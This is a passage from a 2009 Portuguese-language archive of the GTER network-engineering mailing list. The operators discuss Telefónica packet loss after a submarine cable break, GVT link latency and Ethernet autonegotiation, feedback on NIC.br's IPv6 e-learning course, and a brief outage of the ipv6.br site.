aten??o do que o pr?prio material - N?o h? como tirar d?vidas no modelo proposto (excluindo as listas como a do GTER) - Seria interessante ter comments abaixo da apresenta??o para troca de id?ias sobre o tema Bom, n?o sei se isso ? relevante para o trabalho de voc?s, mas fica registrado como informa??o para quem desejar produzir novos cursos de EAD. Abra?os, global 2009/6/1 Antonio M. Moreiras > Senhores, > > Dando continuidade ?s a??es do CGI.br e NIC.br em favor do uso > do IPv6 no Brasil, entrou hoje em funcionamento o site: > > http://curso.ipv6.br > > com nosso "Curso de Introdu??o ao IPv6" em formato e-learning. > > Esperamos que seja ?til! Por gentileza, divulguem. > > Atenciosamente, > > -- > Antonio M. Moreiras > moreiras at nic.br > http://www.ceptro.br > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From herbert at scw.net.br Wed Jun 3 12:51:00 2009 From: herbert at scw.net.br (Herbert Faleiros) Date: Wed, 3 Jun 2009 12:51:00 -0300 Subject: [GTER] =?iso-8859-1?q?Problemas_na_TIWS_=28_Telef=F3nica_=29?= In-Reply-To: <86b352050906030558m6804f4d3gd0038c96e14ec41d@mail.gmail.com> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <86b352050906030558m6804f4d3gd0038c96e14ec41d@mail.gmail.com> Message-ID: <200906031251.01016.herbert@scw.net.br> On Wed 03 Jun 2009 09:58:07 Antonio Carlos Pina wrote: > Nenhuma rela??o direta conosco a n?o ser que os links remanescentes > ficassem sobrecarregados com o roteamento do tr?fego. Mas n?o explicaria o > funcionamento de ping e traceroute, por exemplo e o congelamento do SCP. traffic shapping p/ priorizar os servicos mais essenciais? (j? que est?o com sobrecarga) -- Herbert From rodrigo.broilo at terra.com.br Wed Jun 3 14:20:22 2009 From: rodrigo.broilo at terra.com.br (Rodrigo Broilo) Date: Wed, 3 Jun 2009 14:20:22 -0300 Subject: [GTER] Ainda problemas com a telefonica In-Reply-To: References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <7a152a290906030739k31258d23u946589daf9888a3a@mail.gmail.com> <86b352050906031005p37d2b382kccc34b982fb3d8c4@mail.gmail.com> Message-ID: <005e01c9e46f$94cc2780$be647680$@broilo@terra.com.br> Ol?, A topologia da TIWS est? no seu site. :) *N?o importa o local de rompimento na Am?rica do Sul/Central, isso sempre afetar? um lado do anel. (este rompimento pode ser parcial ou total) (Hip?tese: Imagina que a fibra que interliga o Chile (via Pac?fico) na Am?rica do Norte rompe, todo tr?fego do Chile e Argentina passam para o lado do Atl?ntico e isso afetaria o Brasil com certeza). Abs,. ------------------------------------------------------------- Rodrigo Christian Broilo rodrigo.broilo at terra.com.br ------------------------------------------------------------- Antes de imprimir pense no meio ambiente. Esta mensagem pode conter informa??es confidenciais. Se a recebeu por engano, por favor, devolva-a ao remetente, apague-a e n?o divulgue seu conte?do. This message may contain confidential information. If received in error, please return it to the sender, delete it and do not disclose its content. -----Original Message----- From: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] On Behalf Of Humberto Sartini Sent: Wednesday, June 03, 2009 2:12 PM To: Grupo de Trabalho de Engenharia e Operacao de Redes Subject: Re: [GTER] Ainda problemas com a telefonica Pina, Nesse caso somente o pessoal que conhece a topologia da Tiws poderia explicar :-) -- [ ]'s Humberto Sartini Certificado LPIC-1 http://www.hss.blog.br PGP KEY ID 0xB32E5C8D 2009/6/3 Antonio Carlos Pina > Humberto, > > A Telefonica contou essa historia para todo mundo que abriu chamado. As > minhas d?vidas sobre o assunto na verdade s?o: > > a) Por que o cabo ?tico que liga o Peru ? Am?rica do Norte via Honduras > afetou o Brasil ? > b) Por que o tr?fego PING e TRACEROUTE n?o foi afetado junto com TCP ? > > Sinceramente n?o sei se essa quest?o do cabo explica o problema. Penso que > a > hist?ria ? maior que isso. > > Abs > > > 2009/6/3 Humberto Sartini > > > Pessoal, > > > > Isso ? reflexo do terremoto que teve em Honduras em 29/05/09. O cabo > > submarino rompeu e o trabalho para recuperar n?o deve ser f?cil. > > > > http://www.telecompaper.com/news/SendArticle.aspx?u=False > > > > -- > > [ ]'s > > Humberto Sartini > > Certificado LPIC-1 > > http://www.hss.blog.br > > PGP KEY ID 0xB32E5C8D > > > > 2009/6/3 Mike Tesliuk > > > > > Foi informado aqui na lista uma informa??o referente a um problema com > > > rompimento de fibra, um de nossos usu?rios disse que a telefonica > > > passou hoje a mesma informa??o para ele informando que a estrutura de > > > backup est? sobrecarregada. > > > > > > 2009/6/2 Victor Benincasa : > > > > Mike e colegas de lista, > > > > > > > > Tamb?m estamos com o mesmo problema. Temos servidores na ThePlanet > > > > (Texas-EUA), e h? cerca de 5 dias alguns clientes nossos que utilizam > > > links > > > > da Telef?nica (em especial o Speedy) est?o relatando problemas no > > > > recebimento de e-mails (timeout). > > > > > > > > Ping (pacotes ICMP) trafegam sem problema, j? pacotes TCP tem tido > uma > > > > taxa de perda m?dia de 50%! > > > > > > > > Algu?m tem alguma luz ou contato com pessoal t?cnico da Telefonica? > > > > > > > > -- > > > > Victor Benincasa > > > > http://netbit.com.br > > > > > > > > > > > > ----- Original Message ----- From: "Mike Tesliuk" > > > > > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > > > > > > > Sent: Tuesday, June 02, 2009 2:53 PM > > > > Subject: [GTER] Ainda problemas com a telefonica > > > > > > > > > > > > Ol? Amigos, > > > > > > > > Eu queria saber se algu?m est? tendo problemas com a telefonica ainda > > > > (estamos a uma semana ja) ? > > > > > > > > Temos nossa rede em miami ( 204.16.0.0/22 ) e usu?rios / provedores > > > > que utilizam a estrutura da telefonica n?o est?o chegando at? nossos > > > > servidores (com qualidade), n?s mesmos temos uma lp da telefonica e > > > > tive que trocar para uma conex?o da net para podermos trabalhar > > > > enquanto este problema n?o se resolve, basicamente eu tenho ping ok > > > > atrav?s da telefonica, a rota pelo que me parece eu passo por dentro > > > > da estrutura de adsl da telefonica, abaixo coloco um exemplo da minha > > > > rota. > > > > > > > > traceroute to 204.16.0.1 (204.16.0.1), 30 hops max, 40 byte packets > > > > 1 gw-spo-lins-tel (189.109.27.1) 0.881 ms 0.834 ms 0.766 ms > > > > 2 189-109-5-185.customer.tdatabrasil.net.br (189.109.5.185) 2.096 > > > > ms 2.021 ms 2.016 ms > > > > 3 * * * > > > > 4 201-0-3-65.dsl.telesp.net.br (201.0.3.65) 2.462 ms 2.663 ms > > 2.532 > > > ms > > > > 5 201-63-253-142.customer.tdatabrasil.net.br (201.63.253.142) > 2.810 > > > > ms 2.729 ms 201-63-253-146.customer.tdatabrasil.net.br > > > > (201.63.253.146) 2.754 ms > > > > 6 Xe3-1-0-0-grtsanem2.red.telefonica-wholesale.net.10.16.84.in-add > > > > (84.16.10.17) 4.943 ms 4.008 ms > > > > Xe7-2-0-0-grtsanem2.red.telefonica-wholesale.net (84.16.10.233) > 4.138 > > > > ms > > > > 7 Xe8-1-0-0-grtmiabr6.red.telefonica-wholesale.net (84.16.15.22) > > > > 117.589 ms 117.636 ms 117.604 ms > > > > 8 Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net(213.140.36.229) > > > > 162.865 ms Xe0-0-0-0-grtwaseq4.red.telefonica-wholesale.net > > > > (213.140.36.153) 152.998 ms > > > > Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) > > > > 162.824 ms > > > > 9 Pccwbtn-0-3-0-0-grtwaseq4.red.telefonica-wholesale.net > > > > (213.140.53.22) 315.858 ms 199.672 ms 252.659 ms > > > > 10 braslink.fe3-4.br01.mia02.pccwbtn.net (63.218.113.62) 183.716 > ms > > * > > > * > > > > > > > > > > > > Meus clientes est?o tendo dificuldades para utilizar servi?os de > email > > > > e ftp, sites, eles tentam acessar fica carregando, quando tentam > > > > novamente eles conseguem ( ou n?o ) > > > > > > > > Agrade?o informa??es. > > > > -- > > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > -- > > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter From antoniocarlospina at gmail.com Wed Jun 3 15:35:45 2009 From: antoniocarlospina at gmail.com (Antonio Carlos Pina) Date: Wed, 3 Jun 2009 15:35:45 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> Message-ID: <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> Voce checou poss?veis port-mismatch ? Auto-negocia??o X portas for?adas ? Corre uma lenda por a? que as portas fastethernet devem ser for?adas a 100Mb/s. Na verdade essa hist?ria remonta h? anos quando existia um bug na negocia??o de alguns equipamentos que faziam os mesmos negociarem como half. Isso acabou e s? sobrou a lenda. A regra ?: - Auto-negocia??o com auto-negoci???o - Porta for?ada (sem autoneg) com Porta for?ada Qualquer outra combina??o trar? problemas. Voc? colocou 1 notebook ligado direto no link para eliminar problemas com sua rede, seu firewall, etc? Grato. 2009/6/3 Patrich Pizzolo > Bom dia a todos, > gostaria de ter uma opini?o dos ilustres colegas que integram esta lista. > Tenho um link de 10Mbps por fibra e ap?s um problema em um switch da GVT > meu > tempo de resposta entre a Eth do meu router e a do router da gvt que s?o > interligados por uma fibra est? chegando a picos de at? 946ms com uma m?dia > em torno de 10ms, isso com o link isolado e j? testei com diversos outros > routers e sempre obtenho os mesmos tempos de resposta, definitivamente n?o > tenho problema nesta ponta. Possuo um outro link com a BrT e est? tudo > normal com tempo de resposta excelente sem nenhuma varia??o deste tipo. > Estou nesta situa??o h? 7 dias e o pessoal da operadora insiste em dizer > que > est? tudo normal. J? nem aguento mais falar com eles... > > Algu?m tem alguma id?ia? > > No momento estou pensando em acionar e cancelar o link. > > Abra?os, > Obrigado! > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From gelson.santos at metaverse.com.br Wed Jun 3 15:42:37 2009 From: gelson.santos at metaverse.com.br (Gelson Dias Santos) Date: Wed, 3 Jun 2009 15:42:37 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> Message-ID: <2632ec520906031142p73162f20jf48848f0d44772b8@mail.gmail.com> Problema ? que essa lenda ? muito insistente. A apenas dois anos atr?s eu tive problemas assim entre um Cisco PIX e um Cisco Catalyst 29XX. Continuo adotando a pr?tica de SEMPRE fixar as portas de servidores, routers, switches e qq outra coisa que n?o tenha motivo para trocar de porta sem que os administradores de rede estejam cientes. Gelson 2009/6/3 Antonio Carlos Pina : > Voce checou poss?veis port-mismatch ? Auto-negocia??o X portas for?adas ? > > Corre uma lenda por a? que as portas fastethernet devem ser for?adas a > 100Mb/s. Na verdade essa hist?ria remonta h? anos quando existia um bug na > negocia??o de alguns equipamentos que faziam os mesmos negociarem como half. > Isso acabou e s? sobrou a lenda. > > A regra ?: > > - Auto-negocia??o com auto-negoci???o > - Porta for?ada (sem autoneg) com Porta for?ada > > Qualquer outra combina??o trar? problemas. > > Voc? colocou 1 notebook ligado direto no link para eliminar problemas com > sua rede, seu firewall, etc? > > Grato. > > 2009/6/3 Patrich Pizzolo > >> Bom dia a todos, >> gostaria de ter uma opini?o dos ilustres colegas que integram esta lista. >> Tenho um link de 10Mbps por fibra e ap?s um problema em um switch da GVT >> meu >> tempo de resposta entre a Eth do meu router e a do router da gvt que s?o >> interligados por uma fibra est? chegando a picos de at? 946ms com uma m?dia >> em torno de 10ms, isso com o link isolado e j? testei com diversos outros >> routers e sempre obtenho os mesmos tempos de resposta, definitivamente n?o >> tenho problema nesta ponta. Possuo um outro link com a BrT e est? tudo >> normal com tempo de resposta excelente sem nenhuma varia??o deste tipo. >> Estou nesta situa??o h? 7 dias e o pessoal da operadora insiste em dizer >> que >> est? tudo normal. J? nem aguento mais falar com eles... >> >> Algu?m tem alguma id?ia? >> >> No momento estou pensando em acionar e cancelar o link. >> >> Abra?os, >> Obrigado! >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From antoniocarlospina at gmail.com Wed Jun 3 15:47:58 2009 From: antoniocarlospina at gmail.com (Antonio Carlos Pina) Date: Wed, 3 Jun 2009 15:47:58 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <2632ec520906031142p73162f20jf48848f0d44772b8@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <2632ec520906031142p73162f20jf48848f0d44772b8@mail.gmail.com> Message-ID: <86b352050906031147x3f9d7127i1595e9babaf8a505@mail.gmail.com> O Catalyst 29xx ? de quanto anos atr?s ? Isso pode acontecer com cabeamento ruim tamb?m. A? for?ar a porta mascara o problema. Grato 2009/6/3 Gelson Dias Santos > Problema ? que essa lenda ? muito insistente. A apenas dois anos atr?s > eu tive problemas assim entre um Cisco PIX e um Cisco Catalyst 29XX. > Continuo adotando a pr?tica de SEMPRE fixar as portas de servidores, > routers, switches e qq outra coisa que n?o tenha motivo para trocar de > porta sem que os administradores de rede estejam cientes. > > Gelson > > 2009/6/3 Antonio Carlos Pina : > > Voce checou poss?veis port-mismatch ? Auto-negocia??o X portas for?adas > ? > > > > Corre uma lenda por a? que as portas fastethernet devem ser for?adas a > > 100Mb/s. Na verdade essa hist?ria remonta h? anos quando existia um bug > na > > negocia??o de alguns equipamentos que faziam os mesmos negociarem como > half. > > Isso acabou e s? sobrou a lenda. > > > > A regra ?: > > > > - Auto-negocia??o com auto-negoci???o > > - Porta for?ada (sem autoneg) com Porta for?ada > > > > Qualquer outra combina??o trar? problemas. > > > > Voc? colocou 1 notebook ligado direto no link para eliminar problemas com > > sua rede, seu firewall, etc? > > > > Grato. > > > > 2009/6/3 Patrich Pizzolo > > > >> Bom dia a todos, > >> gostaria de ter uma opini?o dos ilustres colegas que integram esta > lista. > >> Tenho um link de 10Mbps por fibra e ap?s um problema em um switch da GVT > >> meu > >> tempo de resposta entre a Eth do meu router e a do router da gvt que s?o > >> interligados por uma fibra est? chegando a picos de at? 946ms com uma > m?dia > >> em torno de 10ms, isso com o link isolado e j? testei com diversos > outros > >> routers e sempre obtenho os mesmos tempos de resposta, definitivamente > n?o > >> tenho problema nesta ponta. Possuo um outro link com a BrT e est? tudo > >> normal com tempo de resposta excelente sem nenhuma varia??o deste tipo. > >> Estou nesta situa??o h? 7 dias e o pessoal da operadora insiste em dizer > >> que > >> est? tudo normal. J? nem aguento mais falar com eles... > >> > >> Algu?m tem alguma id?ia? > >> > >> No momento estou pensando em acionar e cancelar o link. > >> > >> Abra?os, > >> Obrigado! > >> -- > >> gter list https://eng.registro.br/mailman/listinfo/gter > >> > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From juliano at viasite.com.br Wed Jun 3 15:44:01 2009 From: juliano at viasite.com.br (Juliano S. Nascimento) Date: Wed, 3 Jun 2009 15:44:01 -0300 (BRT) Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> Message-ID: <4414.192.168.1.7.1244054641.squirrel@webmail.viasite.com.br> > Voce checou poss?veis port-mismatch ? Auto-negocia??o X portas for?adas ? > > Corre uma lenda por a? que as portas fastethernet devem ser for?adas a > 100Mb/s. Na verdade essa hist?ria remonta h? anos quando existia um bug na > negocia??o de alguns equipamentos que faziam os mesmos negociarem como > half. > Isso acabou e s? sobrou a lenda. > > A regra ?: > > - Auto-negocia??o com auto-negoci???o > - Porta for?ada (sem autoneg) com Porta for?ada > > Qualquer outra combina??o trar? problemas. > > Voc? colocou 1 notebook ligado direto no link para eliminar problemas com > sua rede, seu firewall, etc? > > Grato. > > 2009/6/3 Patrich Pizzolo > >> Bom dia a todos, >> gostaria de ter uma opini?o dos ilustres colegas que integram esta >> lista. >> Tenho um link de 10Mbps por fibra e ap?s um problema em um switch da GVT >> meu >> tempo de resposta entre a Eth do meu router e a do router da gvt que s?o >> interligados por uma fibra est? chegando a picos de at? 946ms com uma >> m?dia >> em torno de 10ms, isso com o link isolado e j? testei com diversos >> outros >> routers e sempre obtenho os mesmos tempos de resposta, definitivamente >> n?o >> tenho problema nesta ponta. Possuo um outro link com a BrT e est? tudo >> normal com tempo de resposta excelente sem nenhuma varia??o deste tipo. >> Estou nesta situa??o h? 7 dias e o pessoal da operadora insiste em dizer >> que >> est? tudo normal. J? nem aguento mais falar com eles... >> >> Algu?m tem alguma id?ia? >> >> No momento estou pensando em acionar e cancelar o link. Caro, Tivemos o mesmo problema algum tempo atras com a GVT. Depois de muitos testes e alegarem que nossos servidores estavam mal configurados e n?o terem resultados positivos com esta afirma??o, trocaram nossa porta no Switch deles, resolvendo nosso problema. OBS: Alegaram que a vlan estava com uma configura??o errada, ocasionado tais problemas. >> >> Abra?os, >> Obrigado! >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- From rauhmaru at gmail.com Wed Jun 3 15:56:04 2009 From: rauhmaru at gmail.com (=?ISO-8859-1?Q?Raul_Lib=F3rio?=) Date: Wed, 3 Jun 2009 15:56:04 -0300 Subject: [GTER] e-learning IPv6 do NIC.br In-Reply-To: <2dede0e60906030821l7a7e2685pfb5f4ad029fc5f83@mail.gmail.com> References: <4A247806.20301@nic.br> <2dede0e60906030821l7a7e2685pfb5f4ad029fc5f83@mail.gmail.com> Message-ID: <700db58a0906031156x48c726f6ic2c4122bf67638c2@mail.gmail.com> Global, Por pior que seja, ainda ? uma iniciativa. O curso ? introdut?rio, ou seja, n?o ? com esse curso que o cara vai come?ar a utilizar IPv6. Melhoras vem com o decorrer do tempo(ou com a urg?ncia da necessidade). IPv6 n?o ? bicho de 7 cabe?as, s? ? um pouco mais complicado do que achamos 'normal'(v4). Quem realmente tem necessidade de aprender vai ter de correr atr?s de materiais mais did?ticos e completos. Abra?o! 2009/6/3 Anderson Goulart : > Ol? Ant?nio e demais, > > ? uma ?tima iniciativa do CGI.br e NIC.br, entretanto, gostaria que revissem > os modelos de e-learning considerados para este e outros cursos. Talvez eles > n?o sejam suficientes para alcan?ar o objetivo de voc?s: disseminar o IPv6 e > incentivar a migra??o. Digo isso porque estamos conversando sobre o tema na > lista de EAD da Unicamp e alguns estudos j? foram feitos sobre a capacidade > de aprendizado das pessoas. Vou reproduzir abaixo, um trecho de uma das > mensagens do professor Milton Sobreiro que resume a discuss?o: > > "Minha especializa??o em EAD conclu? com um Estudo de > Caso intitulado"Teleaula: Uma outra face da Educomunica??o", onde trabalho a > quest?o da Teleaula sem tirar os olhos em algumas teorias de fundamental > import?ncia - Teoria Cognitiva, Teoria da Comunica??o e Estilos de > Aprendizagem. Para que tivesse uma subst?ncia pr?tica, afinal se tratava de > um Estudo de Caso, fiz uma pesquisa de campo com 100 acad?micos de gradua??o > e p?s-gradua??o lato-senso na modalidade EAD, afim de identificar seus > estilos de aprendizagem de maior predomin?ncia, onde obtive o seguinte > resultado: os estudantes com predomin?ncia sinest?sica somavam 68%, os > visuais 25%, os que apresentavam um "empate t?cnico" entre visual e > sinest?sico eram 4%, s? ent?o vinham os puramente auditivos com 2% e os > visuais auditivos com 1%. > O formato da Teleaula, produzidas com professores em plano americano, slides > est?ticos, pouca movimenta??o, mudan?as de entona??es nas vozes ou BG > sonoro, onde este docente fala, apenas, e monotonamente, e para piorar a > situa??o deixam os slides muito pouco tempo no ar, para que o professor > continue como o detentor pleno do conhecimento, se aproxima ? Educa??o > Banc?ria, repudiada por Paulo Freire, de compet?ncia pedag?gica > indiscut?vel. Ele s? atinge ao auditivo, que aprende com facilidade apenas > ouvindo, mas o visual, que precisa ver o objeto de aprendizado para fazer > suas analogias e mapas mentais, assim como o sinest?sico que precisa > executar atividades, ver movimenta??es e entona??es diferenciadas na voz, > ficam perdidos, dependendo de uma grava??o da aula para que possam > reassist?-las assincronamente para parar, observar os slides, talvez > anot?-los, ou experiment?-los, reouvir algumas falas do docente, para s? > ent?o, tirar alguma coisa da aula... a? j? perdeu a oportunidade de > intera??o ao vivo com aquele professor." > > Considerando o modelo proposto por voc?s no curso de IPv6, um n?mero pequeno > conseguir? absorver o conte?do ou assistir at? o fim. Minha opini?o sobre o > que j? assisti: > > - A pessoa que diz o texto parece n?o saber nada sobre o assunto. Ela tenta > dar ?nfase em trechos das frases para parecer que sabe > - A voz ? cont?nua, sem varia??es > - A pessoa n?o acrescenta nada al?m do que j? est? escrito. Porque n?o fazer > um manual ou cartilha ent?o? > - A leitura ? lenta, cansativa para o ouvinte > - Os detalhes visuais dos bot?es, menus, etc chamam mais aten??o do que o > pr?prio material > - N?o h? como tirar d?vidas no modelo proposto (excluindo as listas como a > do GTER) > - Seria interessante ter comments abaixo da apresenta??o para troca de > id?ias sobre o tema > > Bom, n?o sei se isso ? relevante para o trabalho de voc?s, mas fica > registrado como informa??o para quem desejar produzir novos cursos de EAD. > > > Abra?os, global > > 2009/6/1 Antonio M. Moreiras > >> Senhores, >> >> Dando continuidade ?s a??es do CGI.br e NIC.br em favor do uso >> do IPv6 no Brasil, entrou hoje em funcionamento o site: >> >> http://curso.ipv6.br >> >> com nosso "Curso de Introdu??o ao IPv6" em formato e-learning. >> >> Esperamos que seja ?til! Por gentileza, divulguem. >> >> Atenciosamente, >> >> -- >> Antonio M. Moreiras >> moreiras at nic.br >> http://www.ceptro.br >> >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- Raul Lib?rio http://rauhmaru.blogspot.com/ rauhmaruts?hotmail?com Linux user#4444581 "The bug is on the table." From moreiras at nic.br Wed Jun 3 16:26:40 2009 From: moreiras at nic.br (Antonio M. Moreiras) Date: Wed, 03 Jun 2009 16:26:40 -0300 Subject: [GTER] e-learning IPv6 do NIC.br In-Reply-To: <2dede0e60906030821l7a7e2685pfb5f4ad029fc5f83@mail.gmail.com> References: <4A247806.20301@nic.br> <2dede0e60906030821l7a7e2685pfb5f4ad029fc5f83@mail.gmail.com> Message-ID: <4A26CE70.3010407@nic.br> Ol? Anderson, Agrade?o as cr?ticas e acredito que elas sejam pertinentes. ? bom dizer que contratamos uma empresa especializada e com boa experi?ncia de mercado na ?rea, que nos auxiliou na maioria dos aspectos que voc? citou. Suponho, entretanto, que o que ? estado da arte na academia, n?o seja ainda o estado da arte no mercado... Temos outras ferramentas, que suponho, amenizem a situa??o e complementem o curso, como o site (http://ipv6.br), sala de chat no IRC e, em breve, cursos presenciais com laborat?rio. Se voc? ou o pessoal de EAD da Unicamp puder nos fornecer sugest?es pontuais e pr?ticas sobre como melhorar o curso em si, faremos o poss?vel para implement?-las. Se houver algu?m disposto a usar o conte?do produzido e criar um curso totalmente novo e baseado em melhores t?cnicas, certamente autorizaremos o uso do material. Abra?os. Moreiras. Anderson Goulart escreveu: > Ol? Ant?nio e demais, > > ? uma ?tima iniciativa do CGI.br e NIC.br, entretanto, gostaria que revissem > os modelos de e-learning considerados para este e outros cursos. Talvez eles > n?o sejam suficientes para alcan?ar o objetivo de voc?s: disseminar o IPv6 e > incentivar a migra??o. Digo isso porque estamos conversando sobre o tema na > lista de EAD da Unicamp e alguns estudos j? foram feitos sobre a capacidade > de aprendizado das pessoas. Vou reproduzir abaixo, um trecho de uma das > mensagens do professor Milton Sobreiro que resume a discuss?o: > > "Minha especializa??o em EAD conclu? com um Estudo de > Caso intitulado"Teleaula: Uma outra face da Educomunica??o", onde trabalho a > quest?o da Teleaula sem tirar os olhos em algumas teorias de fundamental > import?ncia - Teoria Cognitiva, Teoria da Comunica??o e Estilos de > Aprendizagem. Para que tivesse uma subst?ncia pr?tica, afinal se tratava de > um Estudo de Caso, fiz uma pesquisa de campo com 100 acad?micos de gradua??o > e p?s-gradua??o lato-senso na modalidade EAD, afim de identificar seus > estilos de aprendizagem de maior predomin?ncia, onde obtive o seguinte > resultado: os estudantes com predomin?ncia sinest?sica somavam 68%, os > visuais 25%, os que apresentavam um "empate t?cnico" entre visual e > sinest?sico eram 4%, s? ent?o vinham os puramente auditivos com 2% e os > visuais auditivos com 1%. > O formato da Teleaula, produzidas com professores em plano americano, slides > est?ticos, pouca movimenta??o, mudan?as de entona??es nas vozes ou BG > sonoro, onde este docente fala, apenas, e monotonamente, e para piorar a > situa??o deixam os slides muito pouco tempo no ar, para que o professor > continue como o detentor pleno do conhecimento, se aproxima ? Educa??o > Banc?ria, repudiada por Paulo Freire, de compet?ncia pedag?gica > indiscut?vel. Ele s? atinge ao auditivo, que aprende com facilidade apenas > ouvindo, mas o visual, que precisa ver o objeto de aprendizado para fazer > suas analogias e mapas mentais, assim como o sinest?sico que precisa > executar atividades, ver movimenta??es e entona??es diferenciadas na voz, > ficam perdidos, dependendo de uma grava??o da aula para que possam > reassist?-las assincronamente para parar, observar os slides, talvez > anot?-los, ou experiment?-los, reouvir algumas falas do docente, para s? > ent?o, tirar alguma coisa da aula... a? j? perdeu a oportunidade de > intera??o ao vivo com aquele professor." > > Considerando o modelo proposto por voc?s no curso de IPv6, um n?mero pequeno > conseguir? absorver o conte?do ou assistir at? o fim. Minha opini?o sobre o > que j? assisti: > > - A pessoa que diz o texto parece n?o saber nada sobre o assunto. Ela tenta > dar ?nfase em trechos das frases para parecer que sabe > - A voz ? cont?nua, sem varia??es > - A pessoa n?o acrescenta nada al?m do que j? est? escrito. Porque n?o fazer > um manual ou cartilha ent?o? > - A leitura ? lenta, cansativa para o ouvinte > - Os detalhes visuais dos bot?es, menus, etc chamam mais aten??o do que o > pr?prio material > - N?o h? como tirar d?vidas no modelo proposto (excluindo as listas como a > do GTER) > - Seria interessante ter comments abaixo da apresenta??o para troca de > id?ias sobre o tema > > Bom, n?o sei se isso ? relevante para o trabalho de voc?s, mas fica > registrado como informa??o para quem desejar produzir novos cursos de EAD. > > > Abra?os, global > > > From welisson at conectcor.com.br Wed Jun 3 16:33:51 2009 From: welisson at conectcor.com.br (Welisson) Date: Wed, 03 Jun 2009 16:33:51 -0300 Subject: [GTER] Problemas no Acesso ao site ipv6.br In-Reply-To: References: Message-ID: <4A26D01F.5030301@conectcor.com.br> Boa tarde a todos Gostaria de saber se est? ocorrendo alguma atualiza??o no site www.ipv6.br, pois o mesmo encontra-se com mensagem do apache, como quem acabou de instalar. ATT. -- Welisson From emiliano.martins at ik1.com.br Wed Jun 3 16:38:27 2009 From: emiliano.martins at ik1.com.br (Emiliano Martins) Date: Wed, 3 Jun 2009 16:38:27 -0300 Subject: [GTER] Problemas no Acesso ao site ipv6.br In-Reply-To: <4A26D01F.5030301@conectcor.com.br> References: <4A26D01F.5030301@conectcor.com.br> Message-ID: <9c0c824e0906031238w7c38cc3bp593fb01277dbc2ac@mail.gmail.com> estou acessando normalmente. 2009/6/3 Welisson > Boa tarde a todos > > Gostaria de saber se est? ocorrendo alguma atualiza??o no site www.ipv6.br, > pois o mesmo encontra-se com mensagem do apache, como quem acabou de > instalar. > > ATT. > > -- > Welisson > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Emiliano Martins iK1 Tecnologia Ltda From moreiras at nic.br Wed Jun 3 16:51:32 2009 From: moreiras at nic.br (Antonio M. Moreiras) Date: Wed, 03 Jun 2009 16:51:32 -0300 Subject: [GTER] Problemas no Acesso ao site ipv6.br In-Reply-To: <9c0c824e0906031238w7c38cc3bp593fb01277dbc2ac@mail.gmail.com> References: <4A26D01F.5030301@conectcor.com.br> <9c0c824e0906031238w7c38cc3bp593fb01277dbc2ac@mail.gmail.com> Message-ID: <4A26D444.4020101@nic.br> Fizemos uma altera??o de configura??o e houve necessidade de reiniciar o apache. Est? OK agora. Moreiras. Emiliano Martins escreveu: > estou acessando normalmente. > > 2009/6/3 Welisson > > >> Boa tarde a todos >> >> Gostaria de saber se est? ocorrendo alguma atualiza??o no site www.ipv6.br, >> pois o mesmo encontra-se com mensagem do apache, como quem acabou de >> instalar. >> >> ATT. >> >> -- >> Welisson >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > > > > From humberto at hss.blog.br Wed Jun 3 16:58:56 2009 From: humberto at hss.blog.br (Humberto Sartini) Date: Wed, 3 Jun 2009 16:58:56 -0300 Subject: [GTER] =?iso-8859-1?q?Seguran=E7a_de_router_BGP?= In-Reply-To: References: Message-ID: Patrick, Verifique no site http://www.bgp4.as/security. Existem v?rios papers focados em diversas implementa??es diferentes. -- [ ]'s Humberto Sartini Certificado LPIC-1 http://www.hss.blog.br PGP KEY ID 0xB32E5C8D 2009/6/3 Patrick Barreto Petronetto > Pessoal, > O que geralmente voc?s fazem para proteger os roteadores que rodam BGP? H? > alguma medida de seguran?a que deve ser aplicada (configurada) no > equipamento para evitar algum tipo de ataque? > > Valeu! > > Patrick Barreto Petronetto > patrick at vol.net.br > > Antes de imprimir, pense em sua responsabilidade e compromisso com o MEIO > AMBIENTE. > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From itamar at ispbrasil.com.br Wed Jun 3 16:36:30 2009 From: itamar at ispbrasil.com.br (Itamar Reis Peixoto) Date: Wed, 3 Jun 2009 16:36:30 -0300 Subject: [GTER] Problemas no Acesso ao site ipv6.br 